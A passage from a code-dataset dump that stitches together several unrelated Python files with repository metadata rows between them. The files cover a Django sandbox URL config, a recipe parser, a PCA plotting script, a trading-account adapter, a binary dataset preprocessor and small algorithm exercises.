        await db.execute(transaction)
        await db.commit()
        return transaction
    @classmethod
    async def get_tokens_by_date(cls, db: AsyncSession, dt: datetime):
        """Return all TokenInfo rows whose created_at equals *dt*."""
        return (await db.execute(
            select(cls).filter_by(created_at=dt)
        )).scalars().all()
| treybrooks/TopCryptosAPI | api/app/models.py | models.py | py | 1,243 | python | en | code | 0 | github-code | 36 |
11538129042 | """
Sandbox URL Configuration
"""
from django.conf import settings
from django.conf.urls import url
from django.views.generic.base import TemplateView
from sandbox.views import BasicSampleFormView, ModesSampleFormView
# NOTE(review): django.conf.urls.url() was removed in Django 4.0; presumably
# this sandbox pins an older Django — migrate to django.urls.re_path when
# upgrading.
urlpatterns = [
    # Dummy homepage listing the demo views
    url(r'^$', TemplateView.as_view(
        template_name="homepage.html"
    ), name='home'),
    # CodeMirror used "raw", without the form machinery
    url(r'^raw/$', TemplateView.as_view(
        template_name="raw.html"
    ), name='raw'),
    # Basic form sample
    url(r'^form/$', BasicSampleFormView.as_view(
        template_name="form.html"
    ), name='form'),
    # Index of all available editor modes
    url(r'^modes/$', ModesSampleFormView.as_view(
        template_name="modes.html"
    ), name='mode-index'),
    # Form sample preconfigured with one specific mode
    url(r'^modes/(?P<mode>[-\w]+)/$', ModesSampleFormView.as_view(
        template_name="modes.html"
    ), name='basic'),
]
| sveetch/djangocodemirror | sandbox/urls.py | urls.py | py | 947 | python | en | code | 31 | github-code | 36 |
def cookbook_read(path='cookbook.txt'):
    """Parse a recipe file into a cook book dictionary.

    Expected file format: a dish-name line, a line with the number of
    ingredients, then one 'name | quantity | measure' line per ingredient;
    recipes are separated by blank lines.

    :param path: recipe file to read (defaults to 'cookbook.txt' so existing
        callers keep working)
    :return: {dish: [{'ingridient_name', 'quantity', 'measure'}, ...]}
    """
    with open(path) as file:
        lines = file.readlines()
    cook_book = {}
    for num, line in enumerate(lines):
        if line == '\n':
            continue
        # A dish header is the first line of the file or any line that
        # directly follows a blank separator line.
        if num == 0 or lines[num - 1] == '\n':
            ingridients = []
            for raw in lines[num + 2:num + 2 + int(lines[num + 1])]:
                parts = raw.split(' | ')
                ingridients.append({
                    'ingridient_name': parts[0],
                    'quantity': int(parts[1]),
                    'measure': parts[2].strip(),
                })
            cook_book[line.strip()] = ingridients
    return cook_book
# print('\n', 'Задание_1:', '\n', '\n', cookbook_read(), '\n', sep = '')
def get_shop_list_by_dishes(cook_book, person_count):
    """Aggregate a shopping list over every dish in *cook_book*.

    Quantities are multiplied by *person_count*; an ingredient used in
    several dishes is summed into one entry (the measure of its first
    occurrence is kept).

    :param cook_book: {dish: [{'ingridient_name', 'quantity', 'measure'}, ...]}
    :param person_count: number of persons to cook for
    :return: {ingredient_name: {'measure': str, 'quantity': int}}
    """
    # The original iterated list(cook_book.keys()) and re-checked membership
    # of every dish in that same list, which was always true; iterate the
    # values directly instead.
    shop_list = {}
    for ingredients in cook_book.values():
        for ingr in ingredients:
            name = ingr['ingridient_name']
            need = ingr['quantity'] * person_count
            if name in shop_list:
                shop_list[name]['quantity'] += need
            else:
                shop_list[name] = {'measure': ingr['measure'], 'quantity': need}
    return shop_list
print('Задание_2:', '\n', '\n', get_shop_list_by_dishes(cookbook_read(), int(input('Введите кол-во персон: '))), sep='')
| sirifox/-2.1.files- | 2.1.files.py | 2.1.files.py | py | 1,382 | python | en | code | 0 | github-code | 36 |
361601527 | import pandas as pd
import glob
import functools
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans
from sklearn import decomposition
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
#from plotnine import *
#from matplotlib.mlab import PCA
# Load every gzipped, tab-separated amino-acid count table.
#data = pd.read_csv('all.aa', sep='\t') #, header=None)
data = pd.concat(map(functools.partial(pd.read_csv, sep='\t', compression='gzip'), glob.glob("../data/aa/*")))
# Keep only the 20 standard amino-acid count columns.
dat = data[list("ARNDCEQGHILKMFPSTWYV")]
# Divide by the row sums to turn counts into per-ORF frequencies.
dat_norm = dat.div(dat.sum(axis=1), axis=0)
# Standardize each amino-acid column (zero mean, unit variance).
dat_scaled = StandardScaler().fit_transform(dat_norm)
# Optional k-means labelling of each row (currently unused).
#clust = KMeans(n_clusters=2).fit(dat_scaled).labels_
# Project onto the first two principal components.
pca = decomposition.PCA(n_components = 2, svd_solver='full').fit(dat_scaled)
dat_pca = pca.transform(dat_scaled)
x_vector = pca.components_[0]
y_vector = pca.components_[1]
# Scatter plot of the PCA scores, coloured by coding/non-coding label.
# The TYPE column may hold either the strings 'coding'/'noncoding' or
# booleans, so the colour map covers both key types.
colors = {'noncoding':'#F2766E', 'coding':'#3CC9CF', True:'#3CC9CF', False:'#F2766E'}
df = pd.DataFrame({'X':dat_pca[:,0],'Y':dat_pca[:,1],'TYPE':data.TYPE})
fig, ax = plt.subplots()
ax.scatter(df['X'], df['Y'], c=df['TYPE'].apply(lambda x: colors[x]), marker='.', linewidths=0.0, alpha=0.1, zorder=5)
# Overlay the loading vectors (biplot arrows), one per amino acid.
# NOTE(review): both x and y are scaled by max(dat_pca[:,0]) (PC1); the y
# component presumably should use max(dat_pca[:,1]) — confirm.
for i in range(len(x_vector)):
    x = (1.2*x_vector[i]*max(dat_pca[:,0]))
    y = (1.2*y_vector[i]*max(dat_pca[:,0]))
    plt.arrow(0, 0, x, y, color='black', width=0.00005, zorder=10)
    plt.text(x*1.1, y*1.1, dat.columns[i], color='black', zorder=10)
print("done")
# Manual legend patches matching the scatter colours.
blue_patch = mpatches.Patch(color='#3CC9CF', label='coding')
pink_patch = mpatches.Patch(color='#F2766E', label='non-coding')
plt.legend(handles=[blue_patch,pink_patch])
ax.set_title('amino-acid frequency of potential ORFs from Lambda phage')
ax.set(xlabel='PC1', ylabel='PC2')
#plt.show()
fig.set_size_inches(20, 10)
fig.savefig('test.png', dpi=100)
| deprekate/goodorfs_experimental | scripts/pca_all.py | pca_all.py | py | 1,954 | python | en | code | 0 | github-code | 36 |
20324309262 | # -*- coding: utf-8 -*-
from django import forms
from bson.objectid import ObjectId
#from lib import get_db
class rich_form(forms.Form):
    """Base form with helpers for read-only HTML rendering and dynamic choices."""

    def as_read(self):
        """Render cleaned_data as HTML table rows.

        Each field becomes '<tr><td>label</td><td>value</td></tr>'; list
        values are concatenated.  NOTE: values are not HTML-escaped, so
        only render trusted/cleaned data with this.

        :return: the concatenated HTML string (the original built it but
            never returned it)
        """
        rt = ''
        for k, v in self.cleaned_data.items():  # iteritems() was py2-only
            rt += '<tr><td>'
            # self.fields (not self.field) is the Django form field registry,
            # consistent with set_choices below.
            rt += str(self.fields[k].label)
            rt += '</td><td>'
            if isinstance(v, list):
                for ite in v:
                    rt += str(ite)
            else:
                rt += str(v)
            rt += '</td></tr>'
        return rt

    def set_choices(self, fieldname, newlist):
        """Replace the choices of *fieldname* at runtime."""
        self.fields[fieldname].choices = newlist
# class email_login(forms.Form):
# email=forms.EmailField(
# label=u'公司邮箱',
# strip=True,
# required=True,
# )
# password=forms.CharField(
# widget=forms.widgets.PasswordInput,
# label=u'密码',
# required=True,
# )
# department=forms.TypedChoiceField(
# label=u'部门',
# choices=[
# ['finance',u'财务部'],
# ['it',u'资讯科技部'],
# ],
# )
# taskname=forms.CharField(
# widget=forms.widgets.HiddenInput,
# )
# fileup=forms.FileField(
# label=u'文件',
# ) | raynardj/terminus | major/share/upgrade/forms.py | forms.py | py | 1,011 | python | en | code | 0 | github-code | 36 |
32033182710 | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
"""
@author:ai
@file:rootNet.py
@time:2020/06/01
"""
import traceback
import warnings
from collections import defaultdict
import arrow
import pandas as pd
from configs.riskConfig import FUTURE_ENDS
from tradingSystem import Order
from configs.Database import mysql, Database
from tradingSystem.rootNet.RootNetTrading import RootNetTrading
from tradingSystem.CATS.catsserverapi.catsConfig import futureEnds, CatsTypeTotradeAcct
from tradingSystem.CATS.catsserverapi.catsDictionary import CASH, TOTALASSET, POSITIONASSET
from utils.Date import getTradeSectionDates
strategyEnvToTradingEnv = {
'prod': 'prod',
'dev': 'test'
}
class rootNet():
    """Adapter around the rootNet trading server plus MySQL persistence.

    Handles login, queries of funds/positions/trades, order submission and
    cancellation, and the end-of-day storage of positions, account values,
    trades and close prices into the configured MySQL environment.
    """
    def __init__(self, env='dev', mode='test', commit=True):
        """
        :param env: MySQL environment key ('dev'/'prod')
        :param mode: environment handed to RootNetTrading ('test'/'prod')
        :param commit: False to run DB writes without committing (dry run)
        """
        self.env = env
        self.mode = mode
        self.commit = commit
        self.trade_date = str(arrow.now().date())
        # first of the last two trading days == previous trade date
        self.pre_trade_date = self.pre_date = getTradeSectionDates(self.trade_date, -2)[0]
        self.tradingServer = RootNetTrading(env=mode)
        self.userAcctInfo = defaultdict(dict)
        self.accountToStrategyid = {} # maps trade account -> strategy id
        self.syst_id = 'rootNet'
        self.security_type = {}
        self.need_change_cash = 0
        # windcodes whose close prices will be stored; seeded with the indices
        self.codesStorage = {'000001.SH', '000300.SH', '399001.SZ'}
        # CATS trade type -> (BS, LS) flags used by the `trade` table
        self.tradeTypeToInt = {
            'B': (1, 1), # buy stock
            'S': (-1, 1), # sell stock
            'B/OPEN': (1, 1), # open long
            'S/OPEN': (1, -1), # open short
            'B/CLOSE': (-1, -1), # close short
            'S/CLOSE': (-1, 1) # close long
        }
    def getPriceInfo(self, windcode):
        """Return the live quote/instrument info object for *windcode*."""
        return self.tradingServer.getStkInfo(windcode)
    def login(self, acct_id, acct_pwd, opt_id, opt_pwd):
        """Log one trade account + operator pair into the trading server.

        :return: None
        """
        self.tradingServer.login(acctId=acct_id, acctPwd=acct_pwd,
                                 optId=opt_id, optPwd=opt_pwd)
    def close(self):
        """Disconnect from the trading server."""
        self.tradingServer.disconnect()
    def getCashAndAssert(self):
        """Collect cash / position value / total asset per account.

        :return: {account: (cash, position_value, totalAsset)}
        """
        result = {}
        fundInfo = self.tradingServer.getFundInfo()
        for account, info in fundInfo.items():
            # position value = stock market value + margin used by futures
            position_value = info.get('currentStkValue', 0)+info.get('marginUsedAmt', 0)
            # usable cash plus the cash frozen by open orders
            cash = info['usableAmt'] + info['tradeFrozenAmt']
            totalAsset = cash + position_value
            result[account] = (cash, position_value, totalAsset)
        return result
    def getAccountInfoByStrategyidsAndLogin(self, strategy_ids):
        """Look up the accounts behind *strategy_ids* and log them all in.

        Fills userAcctInfo, accountToStrategyid and security_type as side
        effects, and caches the comma-joined id string in self.strategids_str
        for later SQL statements.
        """
        sql_user = "select sys_id,user_acct,user_acct_pwd from user_account"
        with mysql(self.env) as cursor:
            cursor.execute(sql_user)
            data = cursor.fetchall()
        for row in data:
            self.userAcctInfo[row[0]]['user_acct'] = row[1]
            self.userAcctInfo[row[0]]['user_acct_pwd'] = row[2]
        self.strategids_str = str(strategy_ids).replace("[", "").replace("]", "").strip(",")
        sql_cash = "select strategy_id,sys_id,acct_type,cats_acct_type,trade_acct,trade_acct_pwd from cash_account where strategy_id in ({})".format(
            self.strategids_str)
        with mysql(self.env, cursor_type='dict') as cursor:
            cursor.execute(sql_cash)
            data = cursor.fetchall()
        for row in data:
            if row['sys_id'] == 'rootNet':
                self.tradingServer.login(acctId=row['trade_acct'],
                                         acctPwd=row['trade_acct_pwd'],
                                         optId=self.userAcctInfo[row['sys_id']]['user_acct'],
                                         optPwd=self.userAcctInfo[row['sys_id']]['user_acct_pwd'],
                                         acctType=row['acct_type'])
                self.accountToStrategyid[row['trade_acct']] = row['strategy_id']
                self.security_type[row['trade_acct']] = row['cats_acct_type']
            else:
                warnings.warn("not support sys_id:{} of strategy:{}".format(row['sys_id'], row['strategy_id']))
    def _get_pre_sod_total_asset(self, strategy_id, trade_date, account_type):
        """Fetch the stored total_asset for (strategy, date, account type).

        NOTE(review): returns the first fetched row (a tuple like
        (total_asset,)), not the bare value; store_account inserts it as-is —
        confirm whether data[0][0] was intended.
        """
        with mysql(self.env) as cursor:
            sql = "select total_asset from account where strategy_id = %s and trade_date = %s and account_type = %s"
            cursor.execute(sql, (strategy_id, trade_date, account_type))
            data = cursor.fetchall()
        if data:
            return data[0]
        else:
            return None
    def getPosition(self, tradeAcct=''):
        """Return positions from the trading server.

        :param tradeAcct: optional single account filter (empty = all)
        :return: positions data as returned by the server
        """
        param = {'acct': [tradeAcct]} if tradeAcct else {}
        positions = self.tradingServer.getPositions(where=param)
        return positions
    def getTrades(self, tradeAcct=''):
        """Return today's trades from the trading server.

        :param tradeAcct: optional single account filter (empty = all)
        :return: trades data as returned by the server
        """
        param = {'acct': [tradeAcct]} if tradeAcct else {}
        trades = self.tradingServer.getTrades(where=param)
        return trades
    def store_position(self):
        """Persist today's positions into the `position` table.

        Also remembers every seen windcode in codesStorage so its close
        price can be stored later.
        """
        positions = self.getPosition()
        if isinstance(positions, pd.DataFrame):
            if positions.empty:
                print("今日持仓为空!")
                return
        else:
            if not positions:
                print("今日持仓为空!")
                return
        positions['strategy_id'] = positions['ACCOUNT'].map(self.accountToStrategyid)
        rows = []
        for index, row in positions.iterrows():
            rows.append((row['strategy_id'], self.trade_date, row["LS"], row['WIND_CODE'],
                         CatsTypeTotradeAcct[self.security_type[row['ACCOUNT']]],
                         row['POSITION'], row['AMOUNT']))
            self.codesStorage.add(row['WIND_CODE'])
        sql_insert = "insert into position (strategy_id,trade_date,LS,windcode,account_type,volume,amount) values (%s,%s,%s,%s,%s,%s,%s)"
        self.saveToDb('position', sql_insert, rows)
    def store_account(self):
        """Persist today's cash/position/total asset per strategy into `account`.

        Falls back to today's total asset when no previous start-of-day
        value exists in the database.
        """
        accountInfo = self.getCashAndAssert()
        print(accountInfo)
        rows = []
        for acct, info in accountInfo.items():
            # info layout: (cash, position_value, totalAsset)
            cash, position_value, totalAsset = info
            strategy_id = self.accountToStrategyid[acct]
            sod_total_asset = self._get_pre_sod_total_asset(strategy_id, self.pre_date,
                                                            CatsTypeTotradeAcct[self.security_type[acct]])
            if sod_total_asset == None:
                sod_total_asset = totalAsset
            rows.append(
                (strategy_id, self.trade_date, CatsTypeTotradeAcct[self.security_type[acct]], position_value, cash,
                 totalAsset, sod_total_asset))
        sql_insert = "insert into `account` (strategy_id,trade_date,account_type,position_value,cash,total_asset,sod_total_asset) " \
                     "values (%s,%s,%s,%s,%s,%s,%s)"
        self.saveToDb('account', sql_insert, rows)
    def store_today_trades(self, ):
        """Persist today's trades into the `trade` table."""
        trades = self.getTrades()
        if isinstance(trades, pd.DataFrame):
            if trades.empty:
                print("今日无成交!")
                return
        else:
            if not trades:
                print("今日无成交!")
                return
        # Columns consumed below:
        # ["WIND_CODE","SECURITY_CODE", "MARKET_TYPE", "SECURITY_NAME",
        # "TRADE_TYPE", "TRADE_PRICE", "TRADE_VOLUME", "TRADE_AMOUNT"]]
        trades = trades
        rows = []
        for index, row in trades.iterrows():
            rows.append((self.trade_date, self.accountToStrategyid[row['ACCOUNT']], row['WIND_CODE'],
                         *self.tradeTypeToInt[row['TRADE_TYPE']],
                         row['TRADE_AMOUNT'], row['TRADE_VOLUME'], row['TRADE_PRICE']))
            self.codesStorage.add(row['WIND_CODE'])
        sql_insert = "insert into trade (trade_date,strategy_id,windcode,BS,LS,notional,volume,price) " \
                     "values (%s,%s,%s,%s,%s,%s,%s,%s)"
        self.saveToDb('trade', sql_insert, rows)
    def submitOrder(self, wind_code: str, tradeSide: str, targetVol: int, price: float):
        """Submit a single order directly.

        :param wind_code: wind code of the instrument
        :param tradeSide: trade direction ('B'/'S')
        :param targetVol: order quantity
        :param price: limit price
        :return: None
        NOTE(review): uses self.acct_id, which is never assigned in this
        class — presumably set elsewhere; confirm before use.
        """
        order = Order(windCode=wind_code, orderType=tradeSide, orderQty=targetVol, orderPrice=price)
        self.tradingServer.sendOrder({self.acct_id: [order]})
    def cancelOrders(self, windcode=''):
        """Cancel all cancellable orders (optionally only for *windcode*)."""
        data = self.tradingServer.getOriginalOrder()
        cancelkeys = self.getCancelKeys(data, windcode)
        self.tradingServer.cancelOrder(cancelkeys)
    def getCancelKeys(self, df, windcode=''):
        """Extract cancellable order keys from the raw order data.

        Filters to rows with CANCELABLE == 'Y' (optionally only *windcode*)
        and returns the CANCEL_KEY values, which are built as
        'acctid^^exchid^^contractNum'.
        :param df: raw order data (DataFrame, or a falsy value when empty)
        :param windcode: optional windcode filter
        :return: list-like of cancel keys
        """
        if isinstance(df, pd.DataFrame):
            if not df.empty:
                df = df[df["CANCELABLE"] == 'Y']
                if windcode:
                    df = df[df['WIND_CODE'] == windcode]
        else:
            if not df:
                return []
        ids = df.CANCEL_KEY.values
        return ids
    def getWindCodeAndMMF(self):
        """Read the static config attributes of the current strategy.

        NOTE(review): relies on self.strategy_id, which is never assigned in
        this class — confirm it is set by the caller.
        :return: {attribute: value}
        """
        sql = "select attribute,value from strategy_static_configs where strategy_id = %s"
        result = {}
        with mysql(self.env) as cursor:
            cursor.execute(sql, self.strategy_id)
            data = cursor.fetchall()
        if data:
            for row in data:
                result[row[0]] = row[1]
        return result
    def getPositionRatioOfMMF(self, windCode=''):
        """Read the target position ratio of *windCode* for this strategy.

        NOTE(review): relies on self.strategy_id (never set in this class)
        and returns the raw fetched row (a tuple) rather than the scalar
        ratio, or 0 when nothing is found — confirm callers expect this.
        """
        sql = "select target_ratio from target_position where strategy_id = %s and windcode = '%s'"
        with mysql(self.env) as cursor:
            cursor.execute(sql, (self.strategy_id, windCode))
            data = cursor.fetchall()
        if data:
            return data[0]
        else:
            return 0
    def storeClosePrice(self):
        """Collect today's close-price info for every stored windcode.

        Futures (codes matching FUTURE_ENDS) use the previous settlement
        price as the pct-change base; everything else uses the close price.
        NOTE(review): `rows` is built but never persisted here — confirm
        whether a saveToDb call is missing.
        :return: {windcode: (trade_date, windcode, newPrice, pctchange,
                  knockQty, knockAmt, preClosePrice)}
        """
        rows = []
        closePrice = {}
        for windCode in self.codesStorage:
            stkInfo = self.tradingServer.getStkInfo(windCode)
            if windCode.endswith(FUTURE_ENDS):
                preSettlePrice = stkInfo.preSettlementPrice
                preClosePrice = stkInfo.preClosePrice
            else:
                preSettlePrice = stkInfo.closePrice
                preClosePrice = stkInfo.closePrice
            pctchange = (stkInfo.newPrice - preSettlePrice) / preSettlePrice if preSettlePrice else 0
            rows.append(
                (self.trade_date, windCode, stkInfo.newPrice, pctchange, stkInfo.knockQty, stkInfo.knockAmt)
            )
            closePrice[windCode] = (
                self.trade_date, windCode, stkInfo.newPrice, pctchange, stkInfo.knockQty, stkInfo.knockAmt,
                preClosePrice)
        return closePrice
    def saveToDb(self,table, sql_insert, rows):
        """Replace today's rows of *table* for the managed strategies.

        Deletes today's rows first, then bulk-inserts *rows*.  Exceptions
        are printed and swallowed (best-effort persistence) — NOTE(review):
        failures therefore go unnoticed by callers.
        """
        with mysql(self.env, commit=self.commit) as cursor:
            try:
                sql_delete = "delete from {} where trade_date = '{}' and strategy_id in ({})".format(table, self.trade_date, self.strategids_str)
                cursor.execute(sql_delete)
                cursor.executemany(sql_insert, rows)
            except:
                traceback.print_exc()
11538242087 | from PIL import Image, ImageDraw
cella = 75
def rect(x1, y1, x2, y2, col):
dib.polygon([(x1, y1), (x2, y1), (x2, y2), (x1, y2)], col)
def cercle(x, y, col):
dib.ellipse([cella*x + 25, cella*y + 25, cella*x + 49, cella*y + 49], col)
c = int(input())
f = int(input())
img = Image.new('RGB', (cella*c, cella*f), 'Beige')
dib = ImageDraw.Draw(img)
mat = []
for j in range(f):
fila = [0]*c
mat += [fila]
mat[0][0] = 1
cercle(0, 0, 'Black')
mat[f-1][c-1] = 1
cercle(c - 1, f - 1, 'Black')
n = int(input())
for r in range(n):
x = int(input()) - 1
y = int(input()) - 1
mat[y][x] = 1
cercle(x, y, 'Black')
x = 0
y = 0
color = ''
while color == '':
if x == c - 1 and y == f - 1:
color = 'Green'
elif x < c - 1 and mat[y][x+1]:
x += 1
elif y < f - 1 and mat[y+1][x]:
y += 1
else:
color = 'Red'
x = 0
y = 0
fi = False
while not fi:
cercle(x, y, color)
if x == c - 1 and y == f - 1:
fi = True
elif x < c - 1 and mat[y][x+1]:
rect(cella*x + cella//2, cella*y + 35, cella*x + 3*cella//2, cella*y + 39, color)
x += 1
elif y < f - 1 and mat[y+1][x]:
rect(cella*x + 35, cella*y + cella//2, cella*x + 39, cella*y + 3*cella//2, color)
y += 1
else:
fi = True
img.save("output.png") | oicatalana/solucions_oicat_2019 | concurs_classificatori2/pb6.py | pb6.py | py | 1,255 | python | en | code | 1 | github-code | 36 |
8265346084 | import csv
import os
import sys
from typing import List
from termcolor import colored
from tqdm import tqdm
from .binaryds import BinaryDs
MINIMUM_FEATURES: int = 32
csv.field_size_limit(sys.maxsize)
def run_preprocess(input_dir: List[str], category: int, output_dir: str,
                   openc: bool, features: int, balanced: bool,
                   seed: int, incomplete: bool) -> None:
    """
    Performs the preprocessing by adding a category and writes (or updates)
    the binary dataset files on disk.
    :param input_dir: Folders where the examples for a single category can be
    found
    :param category: The id of the category that will be written
    :param output_dir: Path to the folder where train.bin, validate.bin and
    test.bin can be found (or will be created).
    :param openc: True if the input uses the function-opcode encoding
    :param features: How many features (i.e. the number of bytes for each
    example)
    :param balanced: True if the produced dataset should have the same
    amount of training/testing/validation samples for each category
    :param seed: The seed that will be used for shuffling
    :param incomplete: True if the dataset should NOT be deduplicated,
    shuffled, balanced or split (useful while more categories still have to
    be added)
    """
    assert (os.path.exists(output_dir))
    # Everything (train+validate+test) is merged back into `train` first,
    # so the new category's examples get mixed with the existing ones.
    train, validate, test = __load_all_into_train(output_dir, features, openc)
    print("Reading and adding new files... ", flush=True)
    files = gather_files(input_dir, openc)
    read_and_add(train, files, category)
    if incomplete:
        print("Deduplicating... ", end="", flush=True)
        print(colored("SKIP", "white", attrs=['bold']), flush=True)
        print("Shuffling... ", end="", flush=True)
        print(colored("SKIP", "white", attrs=['bold']), flush=True)
        print("Balancing... ", end="", flush=True)
        print(colored("SKIP", "white", attrs=['bold']), flush=True)
        print("Splitting... ", end="", flush=True)
        print(colored("SKIP", "white", attrs=['bold']), flush=True)
    else:
        print("Deduplicating... ", end="", flush=True)
        train.deduplicate()
        print(colored("OK", "green", attrs=['bold']), flush=True)
        print("Shuffling... ", end="", flush=True)
        train.shuffle(seed)
        print(colored("OK", "green", attrs=['bold']), flush=True)
        print("Balancing... ", end="", flush=True)
        if balanced:
            train.balance()
            print(colored("OK", "green", attrs=['bold']), flush=True)
        else:
            print(colored("SKIP", "white", attrs=['bold']), flush=True)
        print("Splitting... ", end="", flush=True)
        # Two 50% splits: 50% train, 25% validate, 25% test overall.
        train.split(validate, 0.5)
        validate.split(test, 0.5)
        print(colored("OK", "green", attrs=['bold']), flush=True)
    print("Finalizing... ", end="", flush=True)
    train.close()
    validate.close()
    test.close()
    print(colored("OK", "green", attrs=['bold']), flush=True)
def __load_all_into_train(output_dir: str, features: int,
                          openc: bool) -> (BinaryDs, BinaryDs, BinaryDs):
    """Open the train/validate/test datasets and merge everything into train.

    After merging, validate and test are empty and train holds every
    existing example, ready to be re-split once new data has been added.
    :return: the (train, validate, test) dataset handles
    """
    print("Loading old dataset... ", end="", flush=True)
    path_train = os.path.join(output_dir, "train.bin")
    path_val = os.path.join(output_dir, "validate.bin")
    path_test = os.path.join(output_dir, "test.bin")
    train = BinaryDs(path_train, features=features, encoded=openc).open()
    test = BinaryDs(path_test, features=features, encoded=openc).open()
    validate = BinaryDs(path_val, features=features, encoded=openc).open()
    train.merge(test)
    train.merge(validate)
    print(colored("OK", "green", attrs=['bold']), flush=True)
    return train, validate, test
def read_and_add(dataset: BinaryDs, files: List[str], category: int) -> None:
    """
    Reads the raw files and adds them directly to the dataset as examples.
    Functions/data with more bytes than the number of features will be split
    into several chunks of features length.
    If opcode encoding was chosen, chunks with less than MINIMUM_FEATURES bytes
    (default 32) will be zero-prepadded or discarded, otherwise chunks with an
    amount of bytes different than the number of features will be discarded.
    :param files: List of paths to every file that will be processed.
    :param dataset: dataset where the examples will be added.
    :param category: The category for the current examples.
    """
    buffer = []
    for cur_file in tqdm(files, ncols=60):
        data = list()
        features = dataset.get_features()
        openc = dataset.is_encoded()
        if openc:
            # Opcode-encoded input: one hex string per csv row.
            with open(cur_file, 'r') as f:
                reader = csv.DictReader(f, delimiter=",", quotechar='"',
                                        quoting=csv.QUOTE_NONNUMERIC)
                for row in reader:
                    raw_data = row["opcodes"]
                    encoded_data = bytes.fromhex(raw_data)
                    data.append(encoded_data)
        else:
            # Raw binary input: the whole file is one data blob.
            with open(cur_file, 'rb') as f:
                data.append(f.read())
        # split in chunks of "features" length
        chunked = []
        for el in data:
            chunks = [el[j:j + features] for j in range(0, len(el), features)]
            chunked.extend(chunks)
        if openc:
            # prepad remaining elements with zero bytes and drop ones that
            # are too short (< MINIMUM_FEATURES)
            padded = []
            for element in chunked:
                cur_len = len(element)
                if cur_len >= MINIMUM_FEATURES:
                    missing = features - cur_len
                    padded.append(bytes(missing) + element)
            chunked = padded
        else:
            # drop elements different from feature size
            chunked = list(filter(lambda l: len(l) == features, chunked))
        # append category and add to dataset
        chunked = [(category, x) for x in chunked]
        buffer.extend(chunked)
        if len(buffer) > int(4194304 / (features + 1)):
            # write only when roughly 4 MiB of examples accumulated
            dataset.write(buffer)
            buffer = []
    if len(buffer) > 0:
        # write remaining
        dataset.write(buffer)
def gather_files(paths: List[str], openc: bool) -> List[str]:
    """
    Finds all files contained in a directory (recursively) or passed
    directly, keeping only those whose extension matches the requested
    encoding.
    :param paths: Paths to folders containing the files, or to single files
    :param openc: True if opcode based encoding is requested (collects .csv
    files, .bin otherwise)
    :return: A list of paths to every matching file
    :raise FileNotFoundError: when a given path contributes no matching file
    """
    ext = ".csv" if openc else ".bin"
    files = []
    for path in paths:
        if os.path.isdir(path):
            cur_files = []
            # Join with the directory actually being walked (dirpath), not
            # the top-level path: the original joined against `path`, which
            # produced wrong paths for files in subdirectories.
            for dirpath, _, found in os.walk(path):
                for cur_file in found:
                    cur_files.append(os.path.join(dirpath, cur_file))
        else:
            cur_files = [path]
        cur_files = [x for x in cur_files if os.path.splitext(x)[1] == ext]
        if not cur_files:
            # The original's second string literal lacked the f-prefix, so
            # "{ext}" was printed literally in the message.
            raise FileNotFoundError(f"No files with the correct extension "
                                    f"({ext}) were found in the given folder")
        files.extend(cur_files)
    return files
| inoueke-n/optimization-detector | src/preprocess.py | preprocess.py | py | 7,391 | python | en | code | 3 | github-code | 36 |
def longest_consecutive_subsequence(input_list):
    """Return the longest run of consecutive integers in *input_list*.

    The list is sorted first, then scanned for runs where each element is
    exactly one greater than the previous.  On ties the earliest (smallest)
    run wins.  Duplicates break a run (matching the original behaviour);
    an empty input yields an empty list.

    Fixes two defects of the original implementation: a longest run ending
    at the last element was lost unless it was the only run found, and a
    single-element input returned [] instead of that element.
    """
    values = sorted(input_list)
    if not values:
        return []
    best_start = cur_start = 0
    best_len = cur_len = 1
    for i in range(1, len(values)):
        if values[i] - values[i - 1] == 1:
            cur_len += 1
        else:
            cur_start = i
            cur_len = 1
        # Strict '>' keeps the first run on ties; checking inside the loop
        # also covers a run that extends to the very end of the list.
        if cur_len > best_len:
            best_start = cur_start
            best_len = cur_len
    return values[best_start:best_start + best_len]
def test_function(test_case):
    """Run the solver on test_case[0] and print Pass/Fail against test_case[1]."""
    input_list, expected = test_case
    verdict = "Pass" if longest_consecutive_subsequence(input_list) == expected else "Fail"
    print(verdict)
# Each test case is a pair: [input list, expected longest consecutive run].
test_case_1 = [[5, 4, 7, 10, 1, 3, 55, 2], [1, 2, 3, 4, 5]]
test_function(test_case_1)
test_case_2 = [[2, 12, 9, 16, 10, 5, 3, 20, 25, 11, 1, 8, 6 ], [8, 9, 10, 11, 12]]
test_function(test_case_2)
test_case_3 = [[0, 1, 2, 3, 4], [0, 1, 2, 3, 4]]
test_function(test_case_3)
| sripriya-potnuru/implementations-of-algorithms-and-datastructures | python/array/longest_consecutive_subsequence.py | longest_consecutive_subsequence.py | py | 1,101 | python | en | code | 0 | github-code | 36 |
# Convert an EPANET-style 'Big.inp' network file into plain-text node,
# edge and pump-curve tables plus a summary file ('big.txt').
# Fixes applied: section comparisons now use '==' instead of 'is'
# (identity comparison of str literals relies on CPython interning and
# raises SyntaxWarning on modern interpreters); 'pump_id_proxy' is
# initialised so the summary write cannot raise NameError when no pump
# curves are present; the input file is closed after parsing.
f = open('Big.inp', 'r')
node_file = open('big_node.txt', 'w')
edge_file = open('big_edge.txt', 'w')
pump_file = open('big_pump.txt', 'w')
read_format = ''
node_id = 0
edge_id = 0
pump_id = 0
pump_id_proxy = 0  # last pump id that produced curve output (0 when none)
source = []    # reservoir node ids
outlet = []    # junction nodes with positive demand
node_map = {}  # .inp node name -> sequential integer id
node_str = ''
edge_str = ''
curve_str = ''
edge_map = {}  # edge id -> "head,tail" node names
for line in f:
    if (line.isspace()):
        read_format = ''
        continue
    # Section headers: remember what the following rows describe and skip
    # the column-title line that follows each header.
    if ('[JUNCTIONS]' in line):
        read_format = 'node'
        next(f)
        continue
    if ('[RESERVOIRS]' in line):
        read_format = 'source'
        next(f)
        continue
    if ('[TANKS]' in line):
        read_format = 'tank'
        next(f)
        continue
    if ('[PIPES]' in line):
        read_format = 'pipe'
        next(f)
        continue
    if ('[PUMPS]' in line):
        read_format = 'pump'
        next(f)
        continue
    if ('[VALVES]' in line):
        read_format = 'valve'
        next(f)
        continue
    if (';PUMP: PUMP:' in line):
        pump_id += 1
        read_format = 'pump_curve'
        continue
    if (read_format == 'node'):
        node_id += 1
        data = line.split()
        id = data[0]
        head = float(data[1])
        demand = float(data[2])
        node_map[id] = node_id
        node_type = 0
        if demand > 0:
            outlet.append(node_id)
            node_type = 1
        node_str = '%d %f %f %d\n' % (node_id, demand, head, node_type)
        node_file.write(node_str)
